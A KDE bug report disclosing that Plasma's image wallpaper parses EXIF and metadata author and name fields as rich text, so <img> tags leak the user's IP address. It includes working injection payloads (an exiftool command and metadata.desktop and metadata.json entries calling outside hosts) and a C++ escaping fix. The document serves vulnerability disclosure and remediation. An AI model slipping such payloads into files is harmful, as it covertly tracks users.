https://bugs.kde.org/show_bug.cgi?id=480106
Bug ID: 480106
Summary: plasma wallpaper image parsing IP address leak via EXIF attributes / metadata.desktop / metadata.json
Classification: Plasma
Product: plasmashell
Version: 5.27.10
Platform: Other
OS: Linux
Status: REPORTED
Severity: critical
Priority: NOR
Component: Image Wallpaper
Assignee: plasma-b...@kde.org
Reporter: benjaminfle...@icloud.com
CC: notm...@gmail.com, qydwhotm...@gmail.com, secur...@kde.org
Target Milestone: 1.0

Created attachment 165086
  --> https://bugs.kde.org/attachment.cgi?id=165086&action=edit
IP address leak from plasma wallpaper via QML RichText parsing of user-provided text

SUMMARY
***
exif image information is used by plasma image wallpaper to create a qml richtext string to display author and title of a wallpaper image.

the QML richtext can contain <img> tags which point to outside servers. http:// and ftp:// links in the <img> tags are followed to remote addresses

AUTHOR & NAME fields in metadata.desktop are also affected, as well as the author & name in metadata.json

exploitable EXIF tags: Exif.Image.XPTitle, Exif.Image.DocumentName, Exif.Image.ImageDescription, Exif.Image.Artist, Exif.Image.XPAuthor, Exif.Image.Copyright

bugged code is here: https://github.com/KDE/plasma-workspace/blob/master/wallpapers/image/plugin/finder/mediametadatafinder.cpp#L34
***

STEPS TO REPRODUCE

EASY:
1. download https://www.deutsche-cyberberatung.de/plasma-shell-wallpaper-ip-address-leak.jpg
2. place file in ~/.local/share/wallpapers/
3. go on desktop -> right click -> "configure desktop and wallpaper"
4. see that the code is rendered in UI as QML Richtext

IMAGE w/ EXIF INFO:
1. take random jpg image
2. run `exiftool -Artist='benjaminflesch<br/><img src="https://www.spyber.com/sig-54300.png"/>' bugme.jpg -overwrite_original_in_place`
3. go on desktop -> right click -> "configure desktop and wallpaper"
4. see that the code is rendered in UI as QML Richtext

METADATA.DESKTOP:
[Desktop Entry]
Name=foobar<img src="https://www.spyber.com/sig-54300.png"; /><br/><img src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1>
Author=foobar<img src="https://www.spyber.com/sig-54300.png"; /><br/><img src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1>

METADATA.JSON:
{
    "KPlugin": {
        "Authors": [
            {
                "Name": "Benjamin Flesch <img src='https://www.spyber.com/sig-54300.png' />",
                "Email": "b...@deutsche-cyberberatung.de"
            }
        ],
        "Name": "leakmyaddress <img src='https://www.spyber.com/sig-54300.png' />"
        ....
}

OBSERVED RESULT
html code from exif author field is parsed as QML richtext and allows IP address leak

EXPECTED RESULT
user-provided exif fields should not be parsed

SOFTWARE/OS VERSIONS
kdeplasma-addons 5.27.10-2
plasma-browser-integration 5.27.10-1
plasma-desktop 5.27.10-1
plasma-disks 5.27.10-1
plasma-firewall 5.27.10-1
plasma-framework5 5.114.0-1
plasma-integration 5.27.10-1
plasma-meta 5.27-4
plasma-nm 5.27.10-1
plasma-pa 5.27.10-1
plasma-sdk 5.27.10-1
plasma-systemmonitor 5.27.10-1
plasma-thunderbolt 5.27.10-1
plasma-vault 5.27.10-1
plasma-wayland-session 5.27.10-2
plasma-welcome 5.27.10-1
plasma-workspace 5.27.10-2
plasma-workspace-wallpapers 5.27.10-1
plasmatube 23.08.4-1

ADDITIONAL INFORMATION
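The report's expected result is that user-provided Name and Author values are displayed as text rather than parsed as markup. The sketch below is an added example, not plasma-workspace code: it uses only the C++ standard library, and the helper names `escapeMarkup` and `safeDisplayFields`, the sample file and the `example.invalid` host are all assumptions made for illustration.

```cpp
#include <iostream>
#include <map>
#include <sstream>
#include <string>

// Escape what a rich-text parser treats as markup so the value is shown literally.
std::string escapeMarkup(const std::string &in) {
    std::string out;
    for (char c : in) {
        switch (c) {
        case '&': out += "&amp;"; break;
        case '<': out += "&lt;"; break;
        case '>': out += "&gt;"; break;
        case '"': out += "&quot;"; break;
        default: out += c;
        }
    }
    return out;
}

// Return the escaped Name= and Author= values of the [Desktop Entry] group.
std::map<std::string, std::string> safeDisplayFields(const std::string &text) {
    std::map<std::string, std::string> fields;
    std::istringstream lines(text);
    std::string line;
    bool inEntry = false;
    while (std::getline(lines, line)) {
        if (!line.empty() && line.back() == '\r') line.pop_back();
        if (!line.empty() && line.front() == '[') {
            inEntry = (line == "[Desktop Entry]");
            continue;
        }
        const auto eq = line.find('=');
        if (!inEntry || eq == std::string::npos) continue;
        const std::string key = line.substr(0, eq);
        if (key == "Name" || key == "Author")
            fields[key] = escapeMarkup(line.substr(eq + 1));
    }
    return fields;
}
// Constructed sample shaped like the report's file; example.invalid is a placeholder.
const char *kSample = "[Desktop Entry]\n"
    "Name=foobar<img src=\"https://example.invalid/x.png\" /><br/><h1>huhu</h1>\n"
    "Author=Jane & Co\n";

int main() {
    for (const auto &kv : safeDisplayFields(kSample))
        std::cout << kv.first << " = " << kv.second << "\n";
}
```

In Qt code the same escaping is available as `QString::toHtmlEscaped()`, and a QML `Text` item can be set to `textFormat: Text.PlainText` so that no markup is interpreted at all.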